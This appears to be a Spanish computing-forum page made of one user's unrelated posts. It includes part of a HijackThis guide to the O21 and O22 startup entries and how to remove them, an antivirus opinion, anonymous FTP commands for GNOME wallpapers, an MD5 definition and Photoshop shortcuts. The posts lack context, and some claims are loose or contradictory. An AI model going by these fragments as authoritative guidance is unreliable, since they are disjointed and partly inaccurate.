Ejemplo de Lista O21 - SSODL: System - - C:\WINDOWS\system32\system32.dll

Hijackthis, tiene una base de datos interna que ya reconoce las aplicaciones legítimas y no las lista en el log, asique, cualquier entrada O21 que aparezca ya la puedes considerar sospechosa.
Puedes usar Google para consultar sobre esa DLL o esta lista de DLL's:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.

---

Grupo O22.
Este grupo, corresponde a los archivos que se cargan a través del valor del registro SharedTaskScheduler.
Las entradas en este registro se ejecutan automáticamente cuando inicias Windows. A la fecha sólo CWS.Smartfinder usa esta llave.

Llave del Registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler

Ejemplo de Lista O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll

Ojo! a la hora de borrar estas entradas, ya que algunas son legítimas.Puedes usar Google para buscar más información o ayudarte con esta lista:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

HijackThis borrará el valor asociado del SharedTaskScheduler con esta entrada, pero no borrará el CLSID al que apunta ni el archivo al que apunta el Inprocserver32 de CLSID. Por lo que, como en los grupos anteriores, deberemos entrar en modo seguro y borrarlo manualmente con Unlocker u otro programa similar.

---

Fuente de trabajo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Autor: Zinc
Agradecimientos: Ghastly, Ragnarok.

Olvidé votar, así que lo hago ahora.

En mi opinión, Avira es el mejor antivirus. Al igual que el NOD32 consume pocos recursos, pero este tiene una mejor detección, una mejor protección proactiva contra las amenazas y es más personalizable. Por otro lado, Kaspersky y Bit Defender son muy buenos Antivirus, y tienen una terrible heuristica. El problema es que necesitan de más recursos para poder funcionar correctamente, y no relentizar el resto de las actividades del ordenador, esto le quita accesibilidad, un factor muy importante. Por estos motivos, voto por Avira.

Saludos!

Deja tu opinion, comparte, debate y aprende!

Son obviados los Firewalls que integran suites con antivirus.

Deja tu opinion, comparte, debate y aprende!

Utiliza un recuperador de archivos, o investiga sobre la informática forense, hay guias básicas para recuperar archivos eliminados.

Me llamo la atención esta información, no sé por qué, pero la comparto con ustedes.
Lo que haremos será conectarnos al servidor de GNOME y descargarnos los wallpapers que nos ofrecen.

---

Nos conectamos al FTP

Citarftp You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ingresamos datos:

CitarName: Anonymous
Password: [ENTER]

Recorremos directorios:

Citar
cd
cd "pub/GNOME/teams/art.gnome.org/backgrounds"

Facilitamos la descarga:

Citarprompt off

Descargamos a nuestra resolución:

Citarmget *1280×1024.jpg

Disfruten!

Información: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Vistas previas

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Mi definición de md5:

Codificación de tipo one-way utilizada para la protección e identificación de datos.

Para revisar archivos, te recomiendo File Analizer, es muy completo.

Saludos!

Excelente aporte compañero, te lo fijo ya que la zona no tiene moderación y me parece bueno para los que empiezan.

Saludos y sigue asi!

Un ordenador necesita una cantidad minima significativa de RAM, sino, como esperas que funcione?
Apoyo esa pregunta.. ¿Para qué necesitas que consuma menos memoria?

Saludos!

Muy bueno Javier, pero como te dije por MSN, deja de robarme las ideas

Saludos y felicitaciones!

No sé bien que clase de curso será, pero, te refieres a esto?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos!

Veo que te sirvió el QT, y veo que has conseguido instalarlo.

Felicitaciones!

No recuerdo concretamente el código de Javier, lo tienes a mano?

Recuerdo que me base en el de un colega, Gryphes. Luego, realizé mi código y ahi es cuando pienso que Javier hizo el suyo. Ahora simplemente encontre otra vez el código de Gryphes y volvi a hacer mi versión.

Saludos!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
grax y una ultima cosa en cuestion de foros-blogs de malware cual es el mas completo

Google.

Estos son algunos de los atajos del Photoshop.

• (Espacio) Herramienta Mano
• (Ctrl+H) para ocultar la selección actual
• (X) cambiar el color de fondo por el frontal
• (F) Vista de área de trabajo
• (Ctrl+D) Deseleccionar
• (Ctrl+T) Cambio de tamaño de capas
• (Ctrl+U) Ajustar luminosidad, tono y saturación
• (Ctrl+M) Ajustar curva de colores
• (Ctrl+L) Ajustar los niveles de colores
• (Ctrl+Z) Deshacer último cambio
• (Ctrl+Alt+Z) Deshacer el último paso.
• (T) Insertar texto
• (Ctrl+Intro) Salir del modo Edición de texto
• (Ctrl+I) Invertir los colores
• (Ctrl+E) Fusiona las capas
• (Q) Activa la capa rápida
• (Ctrl+J) Nueva capa vía Copiar
• (Ctrl+Shift+J) Nueva capa vía Cortar
• (Ctrl+Alt+I) Tamaño de la imagen
• (Ctrl+Alt+C) Tamaño del lienzo
• (Ctrl+F) Repetir último filtro utilizado
• (Ctrl+Shift+Coma) Aumenta el tamaño de la fuente, teniendo texto seleccionado.
• (Ctrl+Shift+Punto) Disminuye el tamaño de la fuente, teniendo texto seleccionado.

Básicos:

   1. (spacebar) Herramienta Mano, cuando tenemos ampliada una zona de nuestro proyecto mediante la herramienta Zoom, podemos movernos con la herramienta mano, algo que se utiliza mucho y agiliza es hacerlo mediante la tecla H, también podemos agrandar o disminuir el Zoom pulsando Ctrl+Clic o Shift+Clic respectivamente.
   2. (Z) Herramienta Zoom, pulsando Z cambiamos la herramienta Zoom para ajustar el tamaño de la vista, mientras pulsemos Alt invertiremos el Zoom para alejar.
   3. (Ctrl+0) Ajustar al tamaño de la ventana, para aprovechar al máximo el tamaño del monitor. Es Control más Cero, no la letra "O".
   4. (B) Herramienta Lápiz, extremadamente útil cuando trabajas con máscaras, perfecta combinación con los atajos de teclado Zoom y Herramienta de Mano.
   5. (Ctrl+Z) Deshacer, muy útil para solventar esos pequeños errores que todos cometemos.
   6. (Tab) Muestra/Oculta paletas, sencillo y eficaz, muestra u oculta todas las paletas para tener el proyecto a pantalla completa y sin estorbos.

Intermedios:

   1. ([) Reduce el tamaño del pincel
   2. (]) Aumenta el tamaño del pincel
   3. (Shift+[) Disminuye la suavidad del pincel, en un 25%.
   4. (Shift+]) Aumenta la suavidad del pincel, en un 25%.
   5. (de 1 a 0), varia la opacidad del pincel.
   6. (Shift + del 1 al 0), varia el flujo del pincel.
   7. (Ctrol+Tab) Muestra/Oculta Ventana de Capas, eficaz atajo de teclado para ganar espacio en el proyecto.

Avanzados:

   1. (Ctrl+Shift+N) Nueva capa, sencillo atajo para crear una nueva capa en blanco encima de la capa actual.
   2. (Ctrl+Alt+Shift+N) Nueva capa sin dialogo, lo mismo que el anterior pero sin pasar por el dialogo de etiquetado de la capa, más rápido.
   3. (Ctrl+Shift+C) Copia fusionada, copia el contenido de la selección actual para pegarla en otra capa o en otro proyecto, útil para copiar "lo que se ve".
   4. (Ctrl+Shift+Alt+E) Copia visible, copia el contenido de la seleccion (en cualquier capa) en la capa nueva.
   5. (Ctr+Alt+Shift+K) Atajos de teclado, muestra el dialogo de ayuda y configuración de atajos de teclado, por si estos no han saciado tu sed de atajos de teclado.

Saludos!

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Fuente: Softonic

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Fuente: Softonic

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Fuente: Softonic

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Fuente: Softonic